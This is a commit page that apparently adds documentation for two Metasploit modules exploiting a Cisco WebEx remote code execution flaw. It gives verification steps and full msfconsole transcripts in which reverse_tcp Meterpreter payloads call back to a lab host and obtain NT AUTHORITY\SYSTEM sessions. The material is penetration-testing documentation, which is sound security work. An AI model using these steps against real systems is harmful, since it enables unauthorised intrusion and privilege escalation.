Land #10864, Add Cisco WebEx RCE Modules
This commit is contained in:
Wei Chen
@@ -0,0 +1,62 @@
|
||||
## Description
|
||||
|
||||
This module gets an elevated session with System privileges by exploiting a remote code execution vulnerability found
|
||||
in Cisco's WebEx client software for versions below v33.6.0.655.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Cisco WebEx v33.3.8.7 and below
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Get a session
|
||||
4. Do: ```use exploit/windows/local/webexec```
|
||||
5. Do: ```set SESSION <session>```
|
||||
6. Do: ```run```
|
||||
7. You should get an elevated session.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86
|
||||
|
||||
```
|
||||
|
||||
msf5 > use multi/handler
|
||||
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf5 exploit(multi/handler) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(multi/handler) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.37.1:4444
|
||||
[*] Sending stage (179779 bytes) to 192.168.37.136
|
||||
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49161) at 2018-10-24 09:41:47 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: WIN-MGMN7ND70I1\a_user
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf5 exploit(multi/handler) > use exploit/windows/local/webexec
|
||||
msf5 exploit(windows/local/webexec) > set session 1
|
||||
session => 1
|
||||
msf5 exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf5 exploit(windows/local/webexec) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(windows/local/webexec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.37.1:4444
|
||||
[*] Checking service exists...
|
||||
[*] Writing 73802 bytes to %SystemRoot%\Temp\Ak4U78kG.exe...
|
||||
[*] Launching service...
|
||||
[*] Sending stage (179779 bytes) to 192.168.37.136
|
||||
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.136:49162) at 2018-10-24 09:42:35 -0500
|
||||
[*] Service started...
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter >
|
||||
|
||||
```
|
||||
@@ -0,0 +1,58 @@
|
||||
## Description
|
||||
|
||||
This module exploits a remote code execution vulnerability in Cisco's WebEx client software for versions < v33.6.0.655.
|
||||
|
||||
Vulnerable WebEx clients come with the `WebExService` that can execute arbitrary commands with System privileges.
|
||||
Due to insufficient checks on permissions, a local or domain user can start the `WebExService` through a remote connection
|
||||
and execute code.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Cisco WebEx software v33.3.8.7 and below
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/windows/smb/webexec```
|
||||
4. Do: ```set RHOSTS <IP>```
|
||||
5. Do: ```set SMBUser <USERNAME>```
|
||||
6. Do: ```set SMBPass <PASSWORD>```
|
||||
7. Do: ```run```
|
||||
8. You should get a shell.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86
|
||||
|
||||
```
|
||||
|
||||
msf5 > use exploit/windows/smb/webexec
|
||||
msf5 exploit(windows/smb/webexec) > set smbuser a_user
|
||||
smbuser => a_user
|
||||
msf5 exploit(windows/smb/webexec) > set smbpass password
|
||||
smbpass => password
|
||||
msf5 exploit(windows/smb/webexec) > set rhosts 192.168.37.136
|
||||
rhosts => 192.168.37.136
|
||||
msf5 exploit(windows/smb/webexec) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf5 exploit(windows/smb/webexec) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(windows/smb/webexec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.37.1:4444
|
||||
[*] 192.168.37.136:445 - Connecting to the server...
|
||||
[*] 192.168.37.136:445 - Authenticating to 192.168.37.136:445 as user 'a_user'...
|
||||
[*] 192.168.37.136:445 - Command Stager progress - 0.96% done (999/104435 bytes)
|
||||
[*] 192.168.37.136:445 - Command Stager progress - 1.91% done (1998/104435 bytes)
|
||||
...
|
||||
[*] 192.168.37.136:445 - Command Stager progress - 99.47% done (103880/104435 bytes)
|
||||
[*] 192.168.37.136:445 - Command Stager progress - 100.00% done (104435/104435 bytes)
|
||||
[*] Sending stage (179779 bytes) to 192.168.37.136
|
||||
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49158) at 2018-10-24 09:10:46 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter >
|
||||
|
||||
```
|
||||
Reference in New Issue
Block a user